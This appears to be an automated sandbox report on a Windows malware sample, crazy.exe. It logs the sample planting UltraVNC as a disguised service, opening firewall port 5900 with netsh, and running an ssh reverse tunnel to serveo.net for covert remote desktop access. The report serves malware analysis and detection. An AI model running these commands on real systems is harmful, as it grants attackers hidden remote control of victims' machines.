69cd9793d80b5e5d7f5bf377822dc573c84ef939ede4eedd892fd1b757435bff

General

Target

crazy.exe
Size

5.2MB
MD5

5681f1da959eb80af6735166b1e71cdb
SHA1

74036e08dea67fbbee5d81e07fb24408fe4305fe
SHA256

69cd9793d80b5e5d7f5bf377822dc573c84ef939ede4eedd892fd1b757435bff
SHA512

d175f8adc5f6ac0e1a616bf24f1c3d884ca02e9f057e15ede43297ef0472a80a286ae032acaeedf9a6d87449fb6abe020fcdcb549f79429266919717f711f82d

Score

8^/10

persistence evasion

Malware Config

Signatures

Executes dropped EXE 5 IoCs

Processes:

winvnc.exewinvnc.exetest1.exetest1.exewinvnc.exe

pid process

324 winvnc.exe
1776 winvnc.exe
1876 test1.exe
1892 test1.exe
1808 winvnc.exe

pid	process
324	winvnc.exe
1776	winvnc.exe
1876	test1.exe
1892	test1.exe
1808	winvnc.exe

Suspicious use of SendNotifyMessage 29 IoCs

Processes:

winvnc.exe

pid	process
1808	winvnc.exe
1808	winvnc.exe
1808	winvnc.exe
1808	winvnc.exe
1808	winvnc.exe
1808	winvnc.exe
1808	winvnc.exe
1808	winvnc.exe
1808	winvnc.exe
1808	winvnc.exe
1808	winvnc.exe
1808	winvnc.exe
1808	winvnc.exe
1808	winvnc.exe
1808	winvnc.exe
1808	winvnc.exe
1808	winvnc.exe
1808	winvnc.exe
1808	winvnc.exe
1808	winvnc.exe
1808	winvnc.exe
1808	winvnc.exe
1808	winvnc.exe
1808	winvnc.exe
1808	winvnc.exe
1808	winvnc.exe
1808	winvnc.exe
1808	winvnc.exe
1808	winvnc.exe

Drops file in Windows directory 10 IoCs

Processes:

cmd.exe

description	ioc	process
File opened for modification	C:\Windows\vnc\Install.bat	cmd.exe
File created	C:\Windows\vnc\test1.exe	cmd.exe
File created	C:\Windows\vnc\ultravnc.ini	cmd.exe
File opened for modification	C:\Windows\vnc\ultravnc.ini	cmd.exe
File opened for modification	C:\Windows\vnc\vnchooks.dll	cmd.exe
File created	C:\Windows\vnc\Install.bat	cmd.exe
File created	C:\Windows\vnc\vnchooks.dll	cmd.exe
File created	C:\Windows\vnc\winvnc.exe	cmd.exe
File opened for modification	C:\Windows\vnc\winvnc.exe	cmd.exe
File opened for modification	C:\Windows\vnc\test1.exe	cmd.exe

Runs net.exe
Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031

Suspicious use of WriteProcessMemory 34 IoCs

Processes:

crazy.execmd.exewinvnc.exenet.exetest1.exetest1.exewinvnc.exe

description	pid	process	target process
PID 1544 wrote to memory of 892	1544	crazy.exe	cmd.exe
PID 1544 wrote to memory of 892	1544	crazy.exe	cmd.exe
PID 1544 wrote to memory of 892	1544	crazy.exe	cmd.exe
PID 1544 wrote to memory of 892	1544	crazy.exe	cmd.exe
PID 1544 wrote to memory of 892	1544	crazy.exe	cmd.exe
PID 1544 wrote to memory of 892	1544	crazy.exe	cmd.exe
PID 1544 wrote to memory of 892	1544	crazy.exe	cmd.exe
PID 892 wrote to memory of 324	892	cmd.exe	winvnc.exe
PID 892 wrote to memory of 324	892	cmd.exe	winvnc.exe
PID 892 wrote to memory of 324	892	cmd.exe	winvnc.exe
PID 892 wrote to memory of 324	892	cmd.exe	winvnc.exe
PID 324 wrote to memory of 1036	324	winvnc.exe	net.exe
PID 324 wrote to memory of 1036	324	winvnc.exe	net.exe
PID 324 wrote to memory of 1036	324	winvnc.exe	net.exe
PID 892 wrote to memory of 1504	892	cmd.exe	netsh.exe
PID 892 wrote to memory of 1504	892	cmd.exe	netsh.exe
PID 892 wrote to memory of 1504	892	cmd.exe	netsh.exe
PID 892 wrote to memory of 1504	892	cmd.exe	netsh.exe
PID 1036 wrote to memory of 1692	1036	net.exe	net1.exe
PID 1036 wrote to memory of 1692	1036	net.exe	net1.exe
PID 1036 wrote to memory of 1692	1036	net.exe	net1.exe
PID 892 wrote to memory of 1876	892	cmd.exe	test1.exe
PID 892 wrote to memory of 1876	892	cmd.exe	test1.exe
PID 892 wrote to memory of 1876	892	cmd.exe	test1.exe
PID 892 wrote to memory of 1876	892	cmd.exe	test1.exe
PID 1876 wrote to memory of 1892	1876	test1.exe	test1.exe
PID 1876 wrote to memory of 1892	1876	test1.exe	test1.exe
PID 1876 wrote to memory of 1892	1876	test1.exe	test1.exe
PID 1892 wrote to memory of 1916	1892	test1.exe	cmd.exe
PID 1892 wrote to memory of 1916	1892	test1.exe	cmd.exe
PID 1892 wrote to memory of 1916	1892	test1.exe	cmd.exe
PID 1776 wrote to memory of 1808	1776	winvnc.exe	winvnc.exe
PID 1776 wrote to memory of 1808	1776	winvnc.exe	winvnc.exe
PID 1776 wrote to memory of 1808	1776	winvnc.exe	winvnc.exe

Loads dropped DLL 8 IoCs

Processes:

cmd.exetest1.exetest1.exe

pid process

892 cmd.exe
892 cmd.exe
892 cmd.exe
1876 test1.exe
1892 test1.exe
1892 test1.exe
1892 test1.exe
1892 test1.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

winvnc.exe

description pid process

Token: SeTcbPrivilege 1776 winvnc.exe

pid	process
892	cmd.exe
892	cmd.exe
892	cmd.exe
1876	test1.exe
1892	test1.exe
1892	test1.exe
1892	test1.exe
1892	test1.exe

description	pid	process
Token: SeTcbPrivilege	1776	winvnc.exe

Suspicious behavior: EnumeratesProcesses 89 IoCs

Processes:

winvnc.exewinvnc.exe

pid	process
1776	winvnc.exe
1776	winvnc.exe
1776	winvnc.exe
1808	winvnc.exe
1808	winvnc.exe
1808	winvnc.exe
1808	winvnc.exe
1808	winvnc.exe
1808	winvnc.exe
1808	winvnc.exe
1808	winvnc.exe
1808	winvnc.exe
1808	winvnc.exe
1808	winvnc.exe
1808	winvnc.exe
1808	winvnc.exe
1808	winvnc.exe
1808	winvnc.exe
1808	winvnc.exe
1808	winvnc.exe
1808	winvnc.exe
1808	winvnc.exe
1808	winvnc.exe
1808	winvnc.exe
1808	winvnc.exe
1808	winvnc.exe
1808	winvnc.exe
1808	winvnc.exe
1808	winvnc.exe
1808	winvnc.exe
1808	winvnc.exe
1808	winvnc.exe
1808	winvnc.exe
1808	winvnc.exe
1808	winvnc.exe
1808	winvnc.exe
1808	winvnc.exe
1808	winvnc.exe
1808	winvnc.exe
1808	winvnc.exe
1808	winvnc.exe
1808	winvnc.exe
1808	winvnc.exe
1808	winvnc.exe
1808	winvnc.exe
1808	winvnc.exe
1808	winvnc.exe
1808	winvnc.exe
1808	winvnc.exe
1808	winvnc.exe
1808	winvnc.exe
1808	winvnc.exe
1808	winvnc.exe
1808	winvnc.exe
1808	winvnc.exe
1808	winvnc.exe
1808	winvnc.exe
1808	winvnc.exe
1808	winvnc.exe
1808	winvnc.exe
1808	winvnc.exe
1808	winvnc.exe
1808	winvnc.exe
1808	winvnc.exe

Suspicious use of FindShellTrayWindow 58 IoCs

Processes:

winvnc.exe

pid	process
1808	winvnc.exe
1808	winvnc.exe
1808	winvnc.exe
1808	winvnc.exe
1808	winvnc.exe
1808	winvnc.exe
1808	winvnc.exe
1808	winvnc.exe
1808	winvnc.exe
1808	winvnc.exe
1808	winvnc.exe
1808	winvnc.exe
1808	winvnc.exe
1808	winvnc.exe
1808	winvnc.exe
1808	winvnc.exe
1808	winvnc.exe
1808	winvnc.exe
1808	winvnc.exe
1808	winvnc.exe
1808	winvnc.exe
1808	winvnc.exe
1808	winvnc.exe
1808	winvnc.exe
1808	winvnc.exe
1808	winvnc.exe
1808	winvnc.exe
1808	winvnc.exe
1808	winvnc.exe
1808	winvnc.exe
1808	winvnc.exe
1808	winvnc.exe
1808	winvnc.exe
1808	winvnc.exe
1808	winvnc.exe
1808	winvnc.exe
1808	winvnc.exe
1808	winvnc.exe
1808	winvnc.exe
1808	winvnc.exe
1808	winvnc.exe
1808	winvnc.exe
1808	winvnc.exe
1808	winvnc.exe
1808	winvnc.exe
1808	winvnc.exe
1808	winvnc.exe
1808	winvnc.exe
1808	winvnc.exe
1808	winvnc.exe
1808	winvnc.exe
1808	winvnc.exe
1808	winvnc.exe
1808	winvnc.exe
1808	winvnc.exe
1808	winvnc.exe
1808	winvnc.exe
1808	winvnc.exe

Modifies service 2 TTPs 7 IoCs

persistence

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

netsh.exewinvnc.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\napagent\LocalConfig\UI	netsh.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\uvnc_service	winvnc.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\uvnc_service\Description = "Provides secure remote desktop sharing"	winvnc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\NapAgent\LocalConfig	netsh.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\napagent\LocalConfig\Enroll\HcsGroups	netsh.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\NapAgent\Shas	netsh.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\NapAgent\Qecs	netsh.exe

C:\Users\Admin\AppData\Local\Temp\crazy.exe
"C:\Users\Admin\AppData\Local\Temp\crazy.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1544

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\463.tmp\Install.bat" "
2⤵
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
- Loads dropped DLL
PID:892

C:\Windows\vnc\winvnc.exe
C:\Windows\vnc\winvnc -install
3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
- Modifies service
PID:324

C:\Windows\system32\net.exe
net start "uvnc_service"
4⤵
- Suspicious use of WriteProcessMemory
PID:1036

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start "uvnc_service"
5⤵
PID:1692

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name=vnc action=allow dir=in protocol=tcp localport=5900
3⤵
- Modifies service
PID:1504

C:\Users\Admin\AppData\Local\Temp\463.tmp\test1.exe
test1.exe
3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
- Loads dropped DLL
PID:1876

C:\Users\Admin\AppData\Local\Temp\463.tmp\test1.exe
test1.exe
4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
- Loads dropped DLL
PID:1892

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "ssh -o "StrictHostKeyChecking=no" -R itisme:5800:10.7.0.10:5900 serveo.net"
5⤵
PID:1916

C:\Windows\vnc\winvnc.exe
"C:\Windows\vnc\winvnc.exe" -service
1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:1776

C:\Windows\vnc\winvnc.exe
C:\Windows\vnc\winvnc.exe -service_run
2⤵
- Executes dropped EXE
- Suspicious use of SendNotifyMessage
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:1808

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Modify Existing Service

2

T1031

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\463.tmp\Install.bat

Download Submit
C:\Users\Admin\AppData\Local\Temp\463.tmp\test1.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\463.tmp\test1.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\463.tmp\test1.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\463.tmp\ultravnc.ini

Download Submit
C:\Users\Admin\AppData\Local\Temp\463.tmp\vnchooks.dll

Download Submit
C:\Users\Admin\AppData\Local\Temp\463.tmp\winvnc.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI18762\MSVCR90.dll

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI18762\python27.dll

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI18762\test1.exe.manifest

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI18~1\_socket.pyd

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI18~1\_ssl.pyd

Download Submit
C:\Windows\vnc\UltraVNC.ini

Download Submit
C:\Windows\vnc\winvnc.exe

Download Submit
C:\Windows\vnc\winvnc.exe

Download Submit
C:\Windows\vnc\winvnc.exe

Download Submit
\Users\Admin\AppData\Local\Temp\463.tmp\test1.exe

Download Submit
\Users\Admin\AppData\Local\Temp\463.tmp\test1.exe

Download Submit
\Users\Admin\AppData\Local\Temp\463.tmp\test1.exe

Download Submit
\Users\Admin\AppData\Local\Temp\_MEI18762\msvcr90.dll

Download Submit
\Users\Admin\AppData\Local\Temp\_MEI18762\python27.dll

Download Submit
\Users\Admin\AppData\Local\Temp\_MEI18~1\_socket.pyd

Download Submit
\Users\Admin\AppData\Local\Temp\_MEI18~1\_ssl.pyd

Download Submit
\Windows\vnc\winvnc.exe

Download Submit
memory/324-7-0x0000000000000000-mapping.dmp

Download
memory/892-0-0x0000000000000000-mapping.dmp

Download
memory/1036-10-0x0000000000000000-mapping.dmp

Download
memory/1504-11-0x0000000000000000-mapping.dmp

Download
memory/1692-12-0x0000000000000000-mapping.dmp

Download
memory/1808-31-0x0000000000000000-mapping.dmp

Download
memory/1876-16-0x0000000000000000-mapping.dmp

Download
memory/1892-19-0x0000000000000000-mapping.dmp

Download
memory/1916-30-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads